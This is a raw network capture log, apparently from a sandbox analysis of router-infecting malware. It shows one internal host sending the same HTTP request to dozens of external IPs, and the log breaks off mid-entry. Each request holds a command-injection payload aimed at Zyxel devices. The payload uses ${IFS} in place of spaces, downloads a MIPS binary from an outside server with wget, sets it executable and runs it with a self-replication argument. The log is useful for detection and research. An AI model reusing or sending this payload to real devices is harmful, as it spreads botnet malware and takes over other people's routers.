                                                        Feb 2, 2024 06:20:56.660340071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1208192.168.2.1456100114.162.62.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660383940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1209192.168.2.1443906172.78.27.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660406113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1210192.168.2.143469823.5.226.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660448074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1211192.168.2.1447536183.222.13.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660499096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1212192.168.2.145920069.103.106.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660537958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1213192.168.2.143942087.119.94.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660567045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1214192.168.2.1455984209.66.41.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660605907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1215192.168.2.1441402152.186.40.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660634041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1216192.168.2.143779071.198.181.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660691977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1217192.168.2.145478218.204.3.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660721064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1218192.168.2.143453625.168.42.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660770893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1219192.168.2.1438100152.95.47.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660818100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1220192.168.2.1439012171.32.111.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660840034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1221192.168.2.145147437.158.126.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660892963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1222192.168.2.143571238.198.176.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660942078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1223192.168.2.1449326150.93.124.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660985947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1224192.168.2.146018488.120.231.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661031961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1225192.168.2.1458762172.97.143.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661066055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1226192.168.2.1450428189.47.156.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661118984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1227192.168.2.144495678.97.205.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661178112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1228192.168.2.1433512100.60.15.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661204100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1229192.168.2.1439996128.68.70.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661218882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1230192.168.2.145673467.143.112.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661262989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1231192.168.2.1446778196.214.144.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661292076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1232192.168.2.143704843.20.201.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661345959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1233192.168.2.144159482.177.5.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661379099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1234192.168.2.145155424.227.124.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661422968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1235192.168.2.144831491.18.126.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661468983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1236192.168.2.1444444111.180.128.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661514044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1237192.168.2.145004012.196.2.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661545992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1238192.168.2.1445736221.231.250.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661592960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1239192.168.2.1458738132.116.30.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661633968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1240192.168.2.1448280116.46.174.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661675930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1241192.168.2.145528651.180.238.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661720037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1242192.168.2.1458290123.103.45.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661751032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1243192.168.2.143636261.46.247.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661808968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1244192.168.2.145603872.148.97.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661834002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1245192.168.2.1436940101.142.201.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661856890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1246192.168.2.145840251.81.211.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661896944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1247192.168.2.145682462.11.179.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.661938906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1248192.168.2.143707823.126.43.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.665321112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1249192.168.2.1447370132.50.238.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.665352106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1250192.168.2.1446514122.18.111.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.665373087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1251192.168.2.143571670.8.7.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.665432930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1252192.168.2.1446420118.245.90.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.665488958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1253192.168.2.144073254.48.111.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674660921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1254192.168.2.1459830183.11.42.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674690962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1255192.168.2.1450168161.129.98.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674736977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1256192.168.2.1442530131.53.84.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674787998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1257192.168.2.1457604175.213.122.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674829960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1258192.168.2.145217267.120.12.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674868107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1259192.168.2.1445708121.126.166.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674897909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1260192.168.2.145301673.163.131.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674930096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1261192.168.2.1435414200.167.38.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674954891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1262192.168.2.1445352110.224.203.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.674987078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1263192.168.2.1445094151.52.34.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675038099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1264192.168.2.144520437.114.43.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675067902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1265192.168.2.1442166206.244.92.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675093889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1266192.168.2.1441040174.122.174.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675132990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1267192.168.2.143786875.98.161.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675183058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1268192.168.2.1437518207.248.88.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675209045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1269192.168.2.146013814.66.234.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675271034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1270192.168.2.144235832.58.96.190443
                                                        TimestampBytes transferredDirectionData
